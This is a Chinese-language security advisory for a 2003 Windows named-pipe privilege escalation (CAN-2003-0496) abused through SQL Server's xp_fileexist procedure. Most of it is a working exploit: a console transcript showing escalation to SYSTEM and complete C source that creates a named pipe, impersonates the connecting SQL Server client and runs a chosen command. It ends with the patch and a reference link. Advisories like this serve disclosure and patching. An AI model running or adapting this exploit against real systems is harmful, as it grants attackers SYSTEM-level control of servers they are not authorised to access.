Microsoft Windows CreateFile API命名管道权限提升漏洞发布时间:2003-07-08 更新时间:2003-07-15 严重程度:高 威胁程度:本地管理员权限 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:8128 CVE(CAN) ID:CAN-2003-0496 受影响系统 Microsoft Windows 2000 Advanced Server SP3未影响系统 Microsoft Windows 2000 Advanced Server SP4详细描述 Microsoft Windows未能正确处理CreateFile API建立的命名管道,当以此命名管道作为参数传递给SQL Server的xp_fileexist存储过程时会导致攻击者以SQL进程的权限执行任意命令。 测试代码 C:\>mssqlpipe.exe cmd.exe Creating pipe: \\.\Pipe\atstake Pipe created, waiting for connectection Connect to the database (with isql for example) and execute: xp_fileexist '\\SERVERNAME\pipe\atsstake' Then in command shell #2: C:\>isql -U andreas Password: 1> xp_fileexist '\\TEMP123\pipe\atstake' 2> go File Exists File is a Directory Parent Directory Exists ----------- ------------------- ----------------------- 1 0 1 Then, back in command shell #1: Impersonate user successful, we are running as user: SYSTEM /* tac0tac0.c - pay no attention to the name, long story... * * Author: Maceo * Modified to take advantage of CAN-2003-0496 Named Pipe Filename * Local Privilege Escalation Found by @stake. Use with their Advisory. * -wirepair@sh0dan.org http://sh0dan.org * * * All credits for code go to Maceo, i really did minimal work * with his code, it took me like 3 seconds heh. * Shouts to #innercircle, * */ #include <stdio.h> #include <windows.h> int main(int argc, char **argv) { DWORD dwNumber = 0; DWORD dwType = REG_DWORD; DWORD dwSize = sizeof(DWORD); if (argc != 2) { fprintf(stderr, "Usage: %s <cmd.exe>\nNamed Pipe Local Priv Escalation found by @stake.\n" "This code is to be used with MS-SQL exactly as outlined in their advisory\n" "All credit for this code goes to Maceo, he did a fine job.. -wire\n",argv[0]); exit(1); } // build the next named pipe name // char szPipe[64]; //sprintf(szPipe, "\\\\.\\pipe\\net\\NtControlPipe%lu", ++dwNumber); sprintf(szPipe, "\\\\.\\pipe\\poop"); // create the named pipe before scm can // HANDLE hPipe = 0; hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE|PIPE_WAIT, 2, 0, 0, 0, NULL); if (hPipe == INVALID_HANDLE_VALUE) { printf ("Failed to create named pipe:\n %s\n", szPipe); return 3; } ConnectNamedPipe (hPipe, NULL); // assume the identity of the client // if (!ImpersonateNamedPipeClient (hPipe)) { printf ("Failed to impersonate the named pipe.\n"); CloseHandle(hPipe); return 5; } // display impersonating users name // dwSize = 256; char szUser[256]; GetUserName(szUser, &dwSize); printf ("Impersonating: %s\n", szUser); system(argv[1]); CloseHandle(hPipe); return 0; } 解决方案 厂商已经在最新的补丁包中修补了此漏洞: Microsoft Windows 2000 Server SP3: Microsoft Upgrade Windows 2000 SP4 http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp 相关信息 Named Pipe Filename Local Privilege Escalation http://www.atstake.com/research/advisories/2003/a070803-1.txt |
